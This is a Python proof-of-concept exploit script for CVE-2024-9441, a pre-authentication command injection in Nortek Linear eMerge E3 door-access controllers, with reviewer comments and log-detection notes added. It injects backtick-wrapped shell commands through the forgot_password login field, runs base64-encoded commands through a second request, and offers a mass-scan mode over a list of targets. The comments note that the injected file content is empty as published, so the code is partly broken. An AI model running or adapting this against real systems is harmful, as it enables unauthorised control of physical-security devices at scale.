# Proof-of-concept script for CVE-2024-9441 (Nortek Linear eMerge E3, pre-auth
# command execution), as named in the argparse description in main().
#
# Network behaviour visible in this file, usable as detection input when
# reviewing web-server or proxy logs for the device:
#   1. POST https://<host>:<port>/index.php?c=user&m=forgot_password with a
#      form field `login_id` whose value is wrapped in backticks.
#   2. POST https://<host>:<port>/img/index.html with a form field `c` holding
#      a base64-encoded string.
# Both requests are sent with TLS certificate verification disabled and a
# 5-second timeout.
import argparse
import base64
import requests


# Function to exploit a single target
def exploit(target, port, cmd):
    """Send the two-request sequence to one host and print the outcome.

    Args:
        target: Host name or IP address, interpolated into the URL.
        port: Port, interpolated into the URL (int from argparse, str when
            called from mass_scan()).
        cmd: Command string; it is base64-encoded and sent as form field `c`
            in the second request.

    Returns:
        None. Results and errors are reported with print() only.
    """
    url = f"https://{target}:{port}/index.php?c=user&m=forgot_password"
    # Payload to create malicious PHP file
    # NOTE(review): the string echoed below is empty and the destination is
    # img/index.html, so as published this writes no PHP. The file content was
    # presumably lost when the page was extracted; it is left exactly as shown.
    PAYLOAD = {'login_id': '`echo \'\' > img/index.html`'}
    try:
        # verify=False turns off certificate validation, so the peer's
        # identity is never checked.
        response = requests.post(url, data=PAYLOAD, verify=False, timeout=5)
        # Only the HTTP status is inspected: a 200 is reported as success
        # without confirming that anything changed on the device.
        if response.status_code == 200:
            print("[+] Payload uploaded successfully.")
        else:
            print(f"[-] Failed to upload payload on {target}:{port}.")
            return
        # Second request: the command travels base64-encoded in field `c`.
        cmd_encoded = base64.b64encode(cmd.encode()).decode()
        exec_url = f"https://{target}:{port}/img/index.html"
        exec_payload = {'c': cmd_encoded}
        response = requests.post(exec_url, data=exec_payload, verify=False, timeout=5)
        # Again only the status code decides which message is printed; the
        # response body is echoed verbatim on 200.
        if response.status_code == 200:
            print(f"[+] Command executed on {target}:{port}:")
            print(response.text)
        else:
            print(f"[-] Exploit failed on {target}:{port}.")
    except Exception as e:
        # Every exception raised in the block above is printed and swallowed,
        # so a caller iterating over hosts keeps going.
        print(f"[-] Error with {target}:{port}: {e}")


# Function to perform mass scanning using a list of targets
def mass_scan(targets_file, cmd):
    """Call exploit() once per line of `targets_file`.

    Each line is stripped and split on ':' into exactly two parts
    (target, port); the port is passed on as a string.

    Raises:
        ValueError: from the tuple unpacking when a line does not split into
            exactly two parts; it is not caught here.
    """
    with open(targets_file, 'r') as file:
        for line in file:
            target, port = line.strip().split(':')
            exploit(target, port, cmd)


def main():
    """Parse the command line and dispatch to mass_scan() or exploit().

    --list is checked first and takes precedence over --ip; with neither
    option a usage hint is printed and nothing is sent.
    """
    parser = argparse.ArgumentParser(description="Nortek Linear eMerge E3 Pre-Auth RCE PoC (CVE-2024-9441)")
    parser.add_argument('--ip', help="Target IP address", type=str)
    parser.add_argument('--port', help="Target port", type=int, default=443)
    # The default command is a directory listing of /spider/web.
    parser.add_argument('--cmd', help="Command to execute", type=str, default="/bin/ls -al /spider/web")
    parser.add_argument('--list', help="File containing list of targets (IP:port)", type=str)
    args = parser.parse_args()
    if args.list:
        # --port is ignored on this path; ports come from the file's lines.
        mass_scan(args.list, args.cmd)
    elif args.ip:
        exploit(args.ip, args.port, args.cmd)
    else:
        print("[-] Please provide either a single target (--ip) or a list of targets (--list).")


if __name__ == "__main__":
    main()